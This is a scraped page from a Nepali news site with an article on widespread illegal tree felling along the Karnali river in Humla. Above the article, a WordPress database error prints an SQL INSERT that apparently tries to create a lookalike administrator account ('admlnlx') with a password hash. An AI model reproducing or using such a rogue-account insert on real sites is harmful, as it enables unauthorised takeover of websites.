WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Ba8j7JZknaSSiFBgE/YJ/vc6EDi3T11', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:37:54', '', 'admlnlx', 'admlnlx')

कर्नाली नदी छेउछाउ अत्यधिक वन विनास – Gaule Khabar

कर्नाली नदी छेउछाउ अत्यधिक वन विनास

कर्नाली नदी छेउछाउ अत्यधिक वन विनास

कचहरी डट कम ।। सिमकोटदेखि दार्मादेउलीसम्मको यात्रा गर्दा व्यक्तिगत तथा सामुहिक रुपमा अत्यधिक रुपमा वन विनास भएको पाइन्छ । यसबारे  न त स्थानीयवासीहरुले कतै उजुर बाजुर गरेका छन् न त यसबारे कुनै पहल नै ।

वर्षेनी विभिन्न घरायसी प्रयोजन, अस्थायी खेतीपाती र पशुवस्तुका लागि सयौं रुखहरु कटान गर्ने चलन बढ्दै गएको देखिन्छ । यी रुखहरु कानुनी, वातावरणीय तथा जैविक रुपमा दुलर्भदेखि अति दुलर्भ रुखसम्म परेको देखिन्छ ।

खार्पुनाथदेखि दार्माको देउलीसम्मको यात्रामा केही मात्रामा गन्ती गर्दा पनि करीब दुई हजारभन्दा धेरै रुखहरु अनावश्यक रुपमा कटान गरिएको पाइएको छ । स्थानीयवासीहरुले केही रुखहरुलाई विना इजाजत काटेर प्रयोग गर्दै गरेको देखिन्छ भने धेरै रुखलाई काटेर खोरियाको लागि प्रयोग भएको पाइएको छ ।

यिनीहरुले न त जिल्ला वन कार्यालय हुम्लाबाट इजाजत लिएका छन्, न त सामुदायिक वन र कबुलियत वनबाट पुर्जी नै । यसरी कटान भएर जाने हो भने जलवायु परिवर्तनको असर गाउँ गाउँमा पनि छिटो पर्ने देखिन्छ ।

यस्तो गैह्र कानुनी कामले एकातिर सरकारी राजस्वमा घाटा लागेको छ भने अर्कातिर दुलर्भ वनस्पतिहरु पनि कानुनी अज्ञानता र राजनीतिक दबदबा कारण नासमाँस भएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका